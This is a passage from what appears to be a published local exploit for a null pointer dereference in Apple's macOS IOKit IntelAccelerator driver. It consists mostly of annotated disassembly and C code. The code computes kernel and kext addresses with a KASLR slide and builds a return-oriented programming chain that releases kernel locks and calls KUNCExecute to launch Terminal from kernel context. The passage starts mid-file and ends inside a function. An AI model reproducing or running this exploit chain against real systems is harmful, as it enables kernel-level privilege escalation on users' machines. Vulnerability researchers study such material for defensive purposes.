Apple Mac OS X IOKit IntelAccelerator空指针间接引用本地(3)

  /*
    in IOAcceleratorFamily2
    two locks are held - r12 survives the pivot, this should unlock all the locks from there:
 __text:0000000000006F80                lea    rsi, unk_32223
 __text:0000000000006F87                mov    rbx, [r12+118h]
 __text:0000000000006F8F                mov    rax, [rbx]
 __text:0000000000006F92                mov    rdi, rbx
 __text:0000000000006F95                xor    edx, edx
 __text:0000000000006F97                call    qword ptr [rax+858h]
 __text:0000000000006F9D                mov    rdi, rbx        ; this
 __text:0000000000006FA0                call    __ZN22IOGraphicsAccelerator211unlock_busyEv ; IOGraphicsAccelerator2::unlock_busy(void)
 __text:0000000000006FA5                mov    rdi, [rbx+88h]
 __text:0000000000006FAC                call    _IOLockUnlock
 __text:0000000000006FB1
 __text:0000000000006FB1 loc_6FB1:                              ; CODE XREF: IOAccelContext2::clientMemoryForType(uint,uint *,IOMemoryDescriptor **)+650j
 __text:0000000000006FB1                xor    ecx, ecx
 __text:0000000000006FB3                jmp    loc_68BC
 ...
 __text:00000000000068BC                mov    eax, ecx        ; jumptable 00000000000067F1 default case
 __text:00000000000068BE                add    rsp, 38h
 __text:00000000000068C2                pop    rbx
 __text:00000000000068C3                pop    r12
 __text:00000000000068C5                pop    r13
 __text:00000000000068C7                pop    r14
 __text:00000000000068C9                pop    r15
 __text:00000000000068CB                pop    rbp
 __text:00000000000068CC                retn
  */
  uint64_t unlock_locks = kext_load_addr("com.apple.iokit.IOAcceleratorFamily2") + kaslr_slide + 0x6f80;

printf("0x%016llx\n", unlock_locks);

uint64_t KUNCExecute = kernel_symbol("_KUNCExecute") + kaslr_slide;
  uint64_t thread_exception_return = kernel_symbol("_thread_exception_return") + kaslr_slide;
   
  //char* payload = "/Applications/Calculator.app/Contents/MacOS/Calculator";
  char* payload = "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal";

uint64_t rop_stack[] = {
    0,                //pop r14
    0,                //pop r15
    0,                //pop rbp  +10
    unlock_locks,
    pivot,            //+20  virtual call is rax+20
    0, //+10
    0, //+18
    0,
    0, //+28
    0,
    0, //+38
    0, //pop rbx
    0, //pop r12
    0, //pop r13
    0, //pop r14
    0, //pop r15
    0, //pop rbp
    pop_rdi_ret,
    (uint64_t)payload,
    pop_rsi_ret,
    0,
    pop_rdx_ret,
    0,
    KUNCExecute,
    thread_exception_return
  };

uint64_t* r = malloc(sizeof(rop_stack));
  memcpy(r, rop_stack, sizeof(rop_stack));
  *len = sizeof(rop_stack);
  return r;
 }